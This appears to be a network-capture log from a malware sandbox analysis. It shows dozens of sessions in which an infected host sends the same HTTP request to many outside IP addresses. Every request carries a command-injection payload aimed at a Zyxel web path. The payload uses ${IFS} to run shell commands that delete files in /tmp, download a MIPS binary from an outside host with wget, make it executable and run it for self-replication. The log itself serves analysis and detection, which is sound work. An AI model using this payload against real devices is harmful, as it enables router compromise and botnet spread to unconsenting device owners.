                                                Jan 12, 2024 18:24:20.475708008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                644192.168.2.1356754156.80.101.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.475739002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                645192.168.2.1360436136.23.255.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.475774050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                646192.168.2.1356714194.213.49.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.475821972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                647192.168.2.135282863.5.251.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.475863934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                648192.168.2.135043882.49.89.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.475898027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                649192.168.2.1338672197.42.206.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.475934982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                650192.168.2.1338746176.9.147.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.475966930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                651192.168.2.133625254.80.56.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.476010084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                652192.168.2.1346478191.201.184.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.476054907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                653192.168.2.135419870.238.222.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.476100922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                654192.168.2.134133897.57.126.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.476136923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                655192.168.2.1352822199.119.197.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.476171017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                656192.168.2.1339794120.101.31.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.476206064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                657192.168.2.1355350121.138.158.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.476258993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                658192.168.2.134900084.223.30.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.476295948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                659192.168.2.135351257.71.17.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.476350069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                660192.168.2.1338414184.37.186.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.476397038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                661192.168.2.1341914162.24.104.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.479814053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                662192.168.2.1354722111.124.235.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.479829073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                663192.168.2.1356876139.142.205.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.479873896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                664192.168.2.1353078117.217.228.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.479916096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                665192.168.2.1350464211.223.152.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.479949951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                666192.168.2.1353226109.194.195.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.479995966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                667192.168.2.133558295.18.97.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.480019093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                668192.168.2.1345416126.51.61.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.480037928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                669192.168.2.1355394175.80.99.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.480093956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                670192.168.2.1355330184.238.143.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.480137110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                671192.168.2.13327942.231.243.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.480181932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                672192.168.2.1353444180.84.99.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.490181923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                673192.168.2.135548889.72.51.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.490212917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                674192.168.2.1334254207.244.162.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.490242004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                675192.168.2.134312485.39.137.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.490328074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                676192.168.2.1359810183.44.225.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.490354061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                677192.168.2.136085624.89.218.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.490407944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                678192.168.2.135034439.145.174.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.490454912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                679192.168.2.1353226122.12.247.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.490504980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                680192.168.2.134843635.177.109.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.490535975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                681192.168.2.1360438111.202.31.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.490607023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                682192.168.2.1360326160.55.77.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.490638018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                683192.168.2.1341142125.110.100.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.490685940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                684192.168.2.1353038146.63.12.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.490710020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                685192.168.2.1346658147.136.171.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.490763903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                686192.168.2.1347606120.197.31.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.490809917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                687192.168.2.1357076119.71.162.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.490835905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                688192.168.2.1349048203.33.205.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.490884066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                689192.168.2.1343648194.109.30.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.490926027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                690192.168.2.1358728115.192.195.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.490976095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                691192.168.2.135850277.116.187.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.490998983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                692192.168.2.1357806221.119.190.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.491065979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                693192.168.2.134630223.81.29.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.491091967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                694192.168.2.134563479.152.103.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.491127014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                695192.168.2.1346426142.15.247.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.491174936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                696192.168.2.134137232.98.103.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.491215944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                697192.168.2.135719052.154.183.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.491252899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                698192.168.2.135648042.20.225.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.491306067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                699192.168.2.134919475.226.251.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.491322041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                700192.168.2.1343642137.194.182.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.491378069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                701192.168.2.135690881.189.108.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.491416931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                702192.168.2.1356100175.241.118.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.491451979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                703192.168.2.134741861.35.247.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.491487026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                704192.168.2.133342273.43.1.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.491544962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                705192.168.2.1346706191.103.215.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.491576910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                706192.168.2.1337472207.115.45.72443
                                                TimestampBytes transferredDirectionData
